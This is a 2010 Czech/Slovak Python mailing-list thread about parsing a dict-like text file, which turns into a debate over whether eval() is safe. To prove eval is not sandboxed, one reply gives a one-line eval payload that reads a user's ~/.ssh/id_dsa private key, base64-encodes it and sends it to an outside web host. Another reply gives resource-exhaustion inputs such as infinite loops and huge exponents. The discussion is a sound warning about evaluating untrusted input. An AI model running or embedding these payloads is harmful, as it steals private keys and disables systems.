[python] parsing souboru

Tomas Hnizdil

unread,

May 5, 2010, 2:17:31 AM5/5/10

to Konference PyCZ

Hezky den,
jelikoz s pythonem nemam zas tak moc zkusenosti, napadlo me, ze udelam takovy maly brainstorming, nez se pustim do prace.
Mam soubor, ve kterem mam textova data ve formatu dictionary tj. '{'KLIC': 'hodnota', ...... {'SUBSLOVNIK': 'hodnota' ....} ...}
Potrebuji zjistit hodnotu dvou klicu, ktere jsou umitsteny skoro na konci toho slovniku. Vsechno je to ulozeno jako jedna radka a ma to v prumeru 6000 znaku, prijde mi proto neefektivni to cist od zacatku a navic to nacitat cele do pameti, python ma spoustu sikovnych funkci, o kterych nevim, proto se ptam, zda to jde udelat nejak lepe ...

... staci odkaz, na ktery jsem nenarazil, necekam step by step navod - vazim si vaseho casu :).

diky
Tom

Petr Přikryl

unread,

May 5, 2010, 2:38:05 AM5/5/10

to Konference PyCZ

Tomas Hnizdil

>Mam soubor, ve kterem mam textova data ve formatu dictionary tj. '{'KLIC':
>'hodnota', ...... {'SUBSLOVNIK': 'hodnota' ....} ...}
>Potrebuji zjistit hodnotu dvou klicu, ktere jsou umitsteny skoro na konci
>toho slovniku. Vsechno je to ulozeno jako jedna radka a ma to v prumeru 6000
>znaku, prijde mi proto neefektivni to cist od zacatku a navic to nacitat
>cele do pameti, python ma spoustu sikovnych funkci, o kterych nevim, proto
>se ptam, zda to jde udelat nejak lepe ...

Jak často se to má spouštět? Jak velký ten soubor je? V jakém kódování je?
S jakou verzí Pythonu to má fungovat?

Pokud je na jednom řádku zápis celého slovníku, normálně bych
z toho udělal slovník (eval) a nedělal bych si s tím těžkou hlavu.
Pokud se to nemá provádět velmi intenzivně, nemá smysl se
zabývat optimalizacemi.

Něco takového:

>>> a = "{'a': 1, 'b': 2}"
>>> a
"{'a': 1, 'b': 2}"
>>> d = eval(a)
>>> d
{'a': 1, 'b': 2}
>>>

Petr

Jirka Vejrazka

unread,

May 5, 2010, 4:33:39 AM5/5/10

to Konference PyCZ

Ahoj,

To skoro vypada, jako JSON format, na ktery existuji parsery (I
primo v Pythonu). 6000 znaku nema smysl nijak optimalizovat, to je
zbytecna ztrata casu.

Mrkni se, jestli to nepujde parsovat pres JSON. Evil je zlo, hojne
pouzivane v JS a PHP, v Pythonu jsem ho (nastesti) snad nikdy nevidel.

Jirka

> _______________________________________________
> Python mailing list
> Pyt...@py.cz
> http://www.py.cz/mailman/listinfo/python
>

Hynek Fabian

unread,

May 5, 2010, 5:49:07 AM5/5/10

to Konference PyCZ

Jirka Vejrazka (středa 05 Květen 2010 10:33:39):

> Mrkni se, jestli to nepujde parsovat pres JSON. Evil je zlo, hojne
> pouzivane v JS a PHP, v Pythonu jsem ho (nastesti) snad nikdy nevidel.

Dělám to nerad, ale musím se evalu zastat. Narozdíl od PHP v pythonu eval()
nesežere libovolný kód, ale pouze vyhodnotí výraz. A když se mu podstrčí
nedefaultní jmenné prostory, měl by být dostatečně izolovaný.

"Zlo" se v pythonu jmenuje exec() :-)

Jirka Vejrazka

unread,

May 5, 2010, 6:55:42 AM5/5/10

to Konference PyCZ

A vida, diky za opravu :) Mea culpa :)

Jirka

Jan Janech

unread,

May 5, 2010, 7:08:49 AM5/5/10

to Konference PyCZ

Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre
narusenie bezpecnosti sa da spravit aj v eval.

Proti importom, builtin namespace atd sa daju zabezpecit obe. Nekonecny
cyklus, nekonecna rekurzia, vsetko sa da spravit aj v eval aj v exec.

Jediny rozdiel je v tom, ze jeden vykonava vyrazy a jeden prikazy.

Jan Janech

On 05/05/10 11:49, Hynek Fabian wrote:
> Jirka Vejrazka (stďż˝eda 05 Kvďż˝ten 2010 10:33:39):

>> Mrkni se, jestli to nepujde parsovat pres JSON. Evil je zlo, hojne
>> pouzivane v JS a PHP, v Pythonu jsem ho (nastesti) snad nikdy nevidel.

> Dďż˝lďż˝m to nerad, ale musďż˝m se evalu zastat. Narozdďż˝l od PHP v pythonu eval()
> neseďż˝ere libovolnďż˝ kďż˝d, ale pouze vyhodnotďż˝ vďż˝raz. A kdyďż˝ se mu podstrďż˝ďż˝
> nedefaultnďż˝ jmennďż˝ prostory, mďż˝l by bďż˝t dostateďż˝nďż˝ izolovanďż˝.

>
> "Zlo" se v pythonu jmenuje exec() :-)

> _______________________________________________
> Python mailing list
> Pyt...@py.cz
> http://www.py.cz/mailman/listinfo/python
>
>
>

--

____________________________
Ing. Jan Janech
Katedra softverovych technologii
Fakulta riadenia a informatiky
Zilinska Univerzita

Petr Messner

unread,

May 5, 2010, 8:04:17 AM5/5/10

to Konference PyCZ

Ahoj,

pokud to vypadá jako JSON, asi nejlepší bude použít na to nějakou
knihovnu, jak už tu zaznělo. Další zmíněná možnost, eval, se mi moc
nelíbí.

Načítat do paměti bych se to nebál, 6 kB není zase tolik.

Kdyby to ale náhodou JSON nebyl, pak přeji příjemnou zábavu :)
Poslední dobou se objevují docela šikovné knihovny na parsování textu
pomocí zadané gramatiky, např. malá ukázka pro slovník:
http://gist.github.com/390687

Samozřejmě další možností je použít na obsah souboru regulární výraz,
pokud je to možné.

PM

2010/5/5 Tomas Hnizdil <toma...@gmail.com>:

> Hezky den,
> jelikoz s pythonem nemam zas tak moc zkusenosti, napadlo me, ze udelam
> takovy maly brainstorming, nez se pustim do prace.

> Mam soubor, ve kterem mam textova data ve formatu dictionary tj. '{'KLIC':
> 'hodnota', ...... {'SUBSLOVNIK': 'hodnota' ....} ...}
> Potrebuji zjistit hodnotu dvou klicu, ktere jsou umitsteny skoro na konci
> toho slovniku. Vsechno je to ulozeno jako jedna radka a ma to v prumeru 6000
> znaku, prijde mi proto neefektivni to cist od zacatku a navic to nacitat
> cele do pameti, python ma spoustu sikovnych funkci, o kterych nevim, proto
> se ptam, zda to jde udelat nejak lepe ...
>

> ... staci odkaz, na ktery jsem nenarazil, necekam step by step navod - vazim
> si vaseho casu :).
>
> diky
> Tom
>

Jirka Vejrazka

unread,

May 5, 2010, 8:14:59 AM5/5/10

to Konference PyCZ

> Kdyby to ale náhodou JSON nebyl, pak přeji příjemnou zábavu :)
> Poslední dobou se objevují docela šikovné knihovny na parsování textu
> pomocí zadané gramatiky, např. malá ukázka pro slovník:
> http://gist.github.com/390687

No, kdyby na to doslo, da se samozrejme pouzit pyparsing, ale je to
trochu kanon na vrabce :)

Jirka

Hynek Fabian

unread,

May 5, 2010, 8:26:59 AM5/5/10

to Konference PyCZ

Jan Janech (středa 05 Květen 2010 13:08:49):

> Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre
> narusenie bezpecnosti sa da spravit aj v eval.

Jak?

eval(x, {}, {})

Jakým X se dá z takové konstrukce utéci?

Petr Messner

unread,

May 5, 2010, 8:37:20 AM5/5/10

to Konference PyCZ

eval("__import__('urllib2').urlopen('http://messa.cz/?pepovoklic='+__import__('base64').urlsafe_b64encode(open('/home/pepa/.ssh/id_dsa').read())).read()",
{}, {})

2010/5/5 Hynek Fabian <hynek....@firma.seznam.cz>:

Hynek Fabian

unread,

May 5, 2010, 8:47:00 AM5/5/10

to Konference PyCZ

To je ale krásně hnusný… odvolávám co jsem odvolal a slibuji co jsem slíbil,
evalu se budu nadále vyhýbat obloukem.

Petr Messner (středa 05 Květen 2010 14:37:20):

Jan Janech

unread,

May 5, 2010, 9:12:56 AM5/5/10

to Konference PyCZ

Potesim Vas, z evalu ani z execu sa pokial mi je znamo utiect neda. Teda
ak to clovek vie spravit.

staci nieco taketo:

>>> eval(superNebezpecnyKod, {'__builtins__': {}}, {})

alebo

>>> exec superNebezpecnyKod in {'__builtins__': {}}, {}

zavisi ale od toho, akym situaciam sa chcete vyhnut.

coho sa nezbavite (ani evalom) je napr nekonecna rekurzia:

>>> superNebezpecnyKod='(lambda x=(lambda y: y(y)): x(x))()'

to az tak neboli, ak nemate povolenu nejaku prilis hlboku uroven rekurzie.

co tak ale nekonecny cyklus?

>>> superNebezpecnyKod='(lambda x=[1]: [x.append(1) for i in x])()'

alebo supernarocne operacie?

>>> superNebezpecnyKod='2**10000000000000000'

vela stastia pri vyuzivani evalu a execu :D

Jan Janech

On 05/05/10 14:26, Hynek Fabian wrote:
> Jan Janech (stďż˝eda 05 Kvďż˝ten 2010 13:08:49):

>> Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre
>> narusenie bezpecnosti sa da spravit aj v eval.
> Jak?
>
> eval(x, {}, {})
>

> Jakďż˝m X se dďż˝ z takovďż˝ konstrukce utďż˝ci?

> _______________________________________________
> Python mailing list
> Pyt...@py.cz
> http://www.py.cz/mailman/listinfo/python
>
>
>

Jakub Zíka

unread,

May 5, 2010, 9:27:57 AM5/5/10

to Konference PyCZ

Na Linuxu bych se proti přetížení procesoru bránil tak, že bych
spustil skript jako samostatný proces (např. modul multiprocessing
nebo subprocess) a pak bych mu posílal signály SIGSTOP a SIGCONT přes
funkci os.kill(pid, sig). Kdyby mi připadalo, že už běží nějak moc
dlouho, prostě bych ho vypnul přes signál TERM, pokud by nereagoval
(myslím, že se to může stát, když počítá např. 100000**10000000), tak
signál KILL. Protože by uživatel nemohl změnit chování při přijetí
signálů (protože by nemohl importovat potřebný modul), mělo by to
fungovat celkem spolehlivě. Maximální velikost použité paměti lze
omezit přes modul resource.

2010/5/5 Jan Janech <de...@atlas.sk>:

> Potesim Vas, z evalu ani z execu sa pokial mi je znamo utiect neda. Teda ak
> to clovek vie spravit.
>
> staci nieco taketo:
>
>>>> eval(superNebezpecnyKod, {'__builtins__': {}}, {})
>
> alebo
>
>>>> exec superNebezpecnyKod in {'__builtins__': {}}, {}
>
> zavisi ale od toho, akym situaciam sa chcete vyhnut.
>
> coho sa nezbavite (ani evalom) je napr nekonecna rekurzia:
>
>>>> superNebezpecnyKod='(lambda x=(lambda y: y(y)): x(x))()'
>
> to az tak neboli, ak nemate povolenu nejaku prilis hlboku uroven rekurzie.
>
> co tak ale nekonecny cyklus?
>
>>>> superNebezpecnyKod='(lambda x=[1]: [x.append(1) for i in x])()'
>
> alebo supernarocne operacie?
>
>>>> superNebezpecnyKod='2**10000000000000000'
>
> vela stastia pri vyuzivani evalu a execu :D
>
> Jan Janech
>
>
> On 05/05/10 14:26, Hynek Fabian wrote:
>>

>> Jan Janech (středa 05 Květen 2010 13:08:49):

>>>
>>> Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre
>>> narusenie bezpecnosti sa da spravit aj v eval.
>>
>> Jak?
>>
>> eval(x, {}, {})
>>

>> Jakým X se dá z takové konstrukce utéci?

Jan Janech

unread,

May 5, 2010, 10:08:33 AM5/5/10

to Konference PyCZ

Ak myslite, ze je to take jednoduche, skuste si spustit,

list(xrange(10000000000000))

neviem kolko nul tam moze byt, aby to zobralo. Toto som skusil ked som
pisal predchadzajuci mail. Potom som ho musel pisat znovu, lebo mi linux
zabil thunderbird pre nedostatok pamate.

Viem, ze ak sa to spravi spravne, nemozem v eval a exec pouzivat ziadne
fcie (ani list, ani xrange), takze hentak uplne to napisat nepojde. Ale
verim, ze niekde na svete existuje vacsi borec ako ja ( :-D ) a ten to
dokaze takyto problem vytvorit aj so standardnymi prvkami jazyka.

Jan Janech

On 05/05/10 15:27, Jakub Zďż˝ka wrote:
> Na Linuxu bych se proti pďż˝etďż˝enďż˝ procesoru brďż˝nil tak, ďż˝e bych
> spustil skript jako samostatnďż˝ proces (napďż˝. modul multiprocessing
> nebo subprocess) a pak bych mu posďż˝lal signďż˝ly SIGSTOP a SIGCONT pďż˝es
> funkci os.kill(pid, sig). Kdyby mi pďż˝ipadalo, ďż˝e uďż˝ bďż˝ďż˝ nďż˝jak moc
> dlouho, prostďż˝ bych ho vypnul pďż˝es signďż˝l TERM, pokud by nereagoval
> (myslďż˝m, ďż˝e se to mďż˝e stďż˝t, kdyďż˝ poďż˝ďż˝tďż˝ napďż˝. 100000**10000000), tak
> signďż˝l KILL. Protoďż˝e by uďż˝ivatel nemohl zmďż˝nit chovďż˝nďż˝ pďż˝i pďż˝ijetďż˝
> signďż˝lďż˝ (protoďż˝e by nemohl importovat potďż˝ebnďż˝ modul), mďż˝lo by to
> fungovat celkem spolehlivďż˝. Maximďż˝lnďż˝ velikost pouďż˝itďż˝ pamďż˝ti lze
> omezit pďż˝es modul resource.

>
> 2010/5/5 Jan Janech<de...@atlas.sk>:
>> Potesim Vas, z evalu ani z execu sa pokial mi je znamo utiect neda. Teda ak
>> to clovek vie spravit.
>>
>> staci nieco taketo:
>>
>>>>> eval(superNebezpecnyKod, {'__builtins__': {}}, {})
>>
>> alebo
>>
>>>>> exec superNebezpecnyKod in {'__builtins__': {}}, {}
>>
>> zavisi ale od toho, akym situaciam sa chcete vyhnut.
>>
>> coho sa nezbavite (ani evalom) je napr nekonecna rekurzia:
>>
>>>>> superNebezpecnyKod='(lambda x=(lambda y: y(y)): x(x))()'
>>
>> to az tak neboli, ak nemate povolenu nejaku prilis hlboku uroven rekurzie.
>>
>> co tak ale nekonecny cyklus?
>>
>>>>> superNebezpecnyKod='(lambda x=[1]: [x.append(1) for i in x])()'
>>
>> alebo supernarocne operacie?
>>
>>>>> superNebezpecnyKod='2**10000000000000000'
>>
>> vela stastia pri vyuzivani evalu a execu :D
>>
>> Jan Janech
>>
>>
>> On 05/05/10 14:26, Hynek Fabian wrote:
>>>

>>> Jan Janech (stďż˝eda 05 Kvďż˝ten 2010 13:08:49):

>>>>
>>>> Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre
>>>> narusenie bezpecnosti sa da spravit aj v eval.
>>>
>>> Jak?
>>>
>>> eval(x, {}, {})
>>>

>>> Jakďż˝m X se dďż˝ z takovďż˝ konstrukce utďż˝ci?

Jakub Zíka

unread,

May 5, 2010, 10:16:00 AM5/5/10

to Konference PyCZ

Jak jsem už psal, dá se použít modul resource:

>>> import resource
>>> resource.setrlimit(resource.RLIMIT_AS, (20000000, 20000000))
>>> a = []
>>> while True: a.append(1000)
...
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
MemoryError
>>>

btw. Váš příklad mi nefungoval, asi tam bylo moc nul. Prej to nejde
zkonvertovat na integer. Nebo máte 64-bit procesor?

2010/5/5 Jan Janech <de...@atlas.sk>:

> Ak myslite, ze je to take jednoduche, skuste si spustit,
>
> list(xrange(10000000000000))
>
> neviem kolko nul tam moze byt, aby to zobralo. Toto som skusil ked som pisal
> predchadzajuci mail. Potom som ho musel pisat znovu, lebo mi linux zabil
> thunderbird pre nedostatok pamate.
>
> Viem, ze ak sa to spravi spravne, nemozem v eval a exec pouzivat ziadne fcie
> (ani list, ani xrange), takze hentak uplne to napisat nepojde. Ale verim, ze
> niekde na svete existuje vacsi borec ako ja ( :-D ) a ten to dokaze takyto
> problem vytvorit aj so standardnymi prvkami jazyka.
>
> Jan Janech
>

> On 05/05/10 15:27, Jakub Zíka wrote:
>>
>> Na Linuxu bych se proti přetížení procesoru bránil tak, že bych
>> spustil skript jako samostatný proces (např. modul multiprocessing
>> nebo subprocess) a pak bych mu posílal signály SIGSTOP a SIGCONT přes
>> funkci os.kill(pid, sig). Kdyby mi připadalo, že už běží nějak moc
>> dlouho, prostě bych ho vypnul přes signál TERM, pokud by nereagoval
>> (myslím, že se to může stát, když počítá např. 100000**10000000), tak
>> signál KILL. Protože by uživatel nemohl změnit chování při přijetí
>> signálů (protože by nemohl importovat potřebný modul), mělo by to
>> fungovat celkem spolehlivě. Maximální velikost použité paměti lze

>> omezit přes modul resource.

>>
>> 2010/5/5 Jan Janech<de...@atlas.sk>:
>>>
>>> Potesim Vas, z evalu ani z execu sa pokial mi je znamo utiect neda. Teda
>>> ak
>>> to clovek vie spravit.
>>>
>>> staci nieco taketo:
>>>
>>>>>> eval(superNebezpecnyKod, {'__builtins__': {}}, {})
>>>
>>> alebo
>>>
>>>>>> exec superNebezpecnyKod in {'__builtins__': {}}, {}
>>>
>>> zavisi ale od toho, akym situaciam sa chcete vyhnut.
>>>
>>> coho sa nezbavite (ani evalom) je napr nekonecna rekurzia:
>>>
>>>>>> superNebezpecnyKod='(lambda x=(lambda y: y(y)): x(x))()'
>>>
>>> to az tak neboli, ak nemate povolenu nejaku prilis hlboku uroven
>>> rekurzie.
>>>
>>> co tak ale nekonecny cyklus?
>>>
>>>>>> superNebezpecnyKod='(lambda x=[1]: [x.append(1) for i in x])()'
>>>
>>> alebo supernarocne operacie?
>>>
>>>>>> superNebezpecnyKod='2**10000000000000000'
>>>
>>> vela stastia pri vyuzivani evalu a execu :D
>>>
>>> Jan Janech
>>>
>>>
>>> On 05/05/10 14:26, Hynek Fabian wrote:
>>>>

>>>> Jan Janech (středa 05 Květen 2010 13:08:49):

>>>>>
>>>>> Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre
>>>>> narusenie bezpecnosti sa da spravit aj v eval.
>>>>
>>>> Jak?
>>>>
>>>> eval(x, {}, {})
>>>>

>>>> Jakým X se dá z takové konstrukce utéci?

Jan Janech

unread,

May 5, 2010, 10:39:51 AM5/5/10

to Konference PyCZ

>>>> import resource
>>>> resource.setrlimit(resource.RLIMIT_AS, (20000000, 20000000))

hm resource modul som nepoznal, mozno by to slo vyriesit nejak takto.
Osobne ale radsej pouzijem eval a exec iba tam, kde ma bezpecnost az tak
nepali. Mam ich sice rad, ale urcite to nie je laska bez hranic.

> btw. Vďż˝ pďż˝ďż˝klad mi nefungoval, asi tam bylo moc nul. Prej to nejde
> zkonvertovat na integer. Nebo mďż˝te 64-bit procesor?

hej mam 64bit procesor. Ale ako som pisal, neviem kolko nul to este
zozerie a skusat to nebudem (zase by mi to pozabijalo vsetko mozne :-D )

Ten resource modul ale urcite niekedy vyskusam, ked budem mat viac casu,
ze ci to pomoze aj v takychto situaciach.

Jan Janech

Petr Přikryl

unread,

May 6, 2010, 4:00:38 AM5/6/10

to Konference PyCZ

>Tomas Hnizdil

>> Mam soubor, ve kterem mam textova data ve formatu dictionary tj. '{'KLIC':
>> 'hodnota', ...... {'SUBSLOVNIK': 'hodnota' ....} ...}
>> Potrebuji zjistit hodnotu dvou klicu, ktere jsou umitsteny skoro na konci
>> toho slovniku. Vsechno je to ulozeno jako jedna radka a ma to v prumeru 6000
>> znaku, prijde mi proto neefektivni to cist od zacatku a navic to nacitat

Petr Messner

>pokud to vypadá jako JSON, asi nejlepší bude použít na to nějakou
>knihovnu, jak už tu zaznělo. Další zmíněná možnost, eval, se mi moc
>nelíbí.

Do stohu bych se sirkama taky nelezl a dětem bych nedával ostrý nůž na hraní.
Je to záležitost volby. Pokud jde o utilitku "narychlo", pro vlastní potřebu,
je podle mě použití eval() bez problémů.

Nebezpečnost eval() je úzce spojená se znalostí jeho vstupu.
Pokud jsem schopen ohlídat, že tam nic špatného nepronikne,
je to OK. Záleží na tom, kdo ten zpracovávaný soubor připravuje.

Je jasné, že do webové služby by se to cpát nemělo.

Modul json je od Python 2.6 mezi standardními moduly.

Mějte se fajn,
Petr

ViNiL

unread,

May 6, 2010, 10:02:52 AM5/6/10

to Konference PyCZ

Petr Messner:

>> eval(x, {}, {})
>>
>> Jakďż˝m X se dďż˝ z takovďż˝ konstrukce utďż˝ci?
>

> eval("__import__('urllib2').urlopen('http://messa.cz/?pepovoklic='+__import__('base64').urlsafe_b64encode(open('/home/pepa/.ssh/id_dsa').read())).read()",
> {}, {})
>

Tak to je odpoved, az srdecko zaplesalo :-D
Myslim, ze je na case zavest soutez o prispevek mesice...

V.